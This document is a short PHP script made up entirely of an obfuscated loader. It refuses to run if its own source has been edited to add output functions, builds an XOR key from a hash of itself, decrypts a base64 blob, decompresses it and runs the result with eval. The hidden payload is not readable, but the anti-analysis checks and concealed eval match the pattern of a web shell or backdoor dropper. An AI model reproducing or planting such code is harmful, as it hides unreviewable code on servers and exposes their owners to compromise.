<?php
$dhpdvzxuw="c18aa2ce31e2e0776963dcb6a29aae5a";
$qqrqkmclcco="5a000a52075700010a55560b0605030e5309530a56540400580b5b0205015050";
$factuiirzbli="ZGBfWaVVb9mzcnHwA9gx+xOhVLXVHc+wnrlO9On1tt0RjOrP10HHm92T187HEtNUbdBItsI0MR3p37jHTqRWQc2PnYPtR6sOc4+9aFJjULZwIZlr1nd1EZcAczC3p3XoULcaq8YnXxJUnkKMnQQ5eWZEarCr6Vnm0P9+bfSFAVKGZgZMdrFLaBN1SKFiSPQ0eFwfX0rpCuWPDdA68kgHXQbA213smBvdmpyGQ8JFSGBWSjjhhYOFif2kAY2JLkW6z3EsYF5xVzA7KgjYVoJWgAu1iwtztEQlpSg+XXiyriy4Xo0gcizPhQ4RucBs";
$heaszv=file_get_contents(__FILE__);
$noxjibl=str_replace($factuiirzbli,"",$heaszv);
if(strpos($noxjibl,"ec"."ho")!==false||strpos($noxjibl,"pr"."int")!==false||strpos($noxjibl,"var_"."dump")!==false||strpos($noxjibl,"file_put_"."contents")!==false||strpos($noxjibl,"fw"."rite")!==false){die();}
$uznulav=str_replace(array($dhpdvzxuw,$qqrqkmclcco),array("SP_6d18f5b9","KP_b3b57366"),$heaszv);
$qmqxhedmnej=md5($uznulav);
$rndxbaiq=hex2bin($qqrqkmclcco);
$ovvhtcn="";
$tmzjpvadgifs=strlen($qmqxhedmnej);
for($qltfnttntpro=0;$qltfnttntpro<$tmzjpvadgifs;$qltfnttntpro++){
    $ovvhtcn.=chr(ord($rndxbaiq[$qltfnttntpro])^ord($qmqxhedmnej[$qltfnttntpro]));
}
$xxaidyfxqbwd=base64_decode($factuiirzbli);
$phlvtaljpfoc=strlen($xxaidyfxqbwd);
$dxyfnamxnb="";
$yjypeu=strlen($ovvhtcn);
for($qltfnttntpro=0;$qltfnttntpro<$phlvtaljpfoc;$qltfnttntpro++){
    $dxyfnamxnb.=$xxaidyfxqbwd[$qltfnttntpro]^$ovvhtcn[$qltfnttntpro%$yjypeu];
}
$hxyadpkajd="gz"."in"."fl"."ate";
eval($hxyadpkajd($dxyfnamxnb));
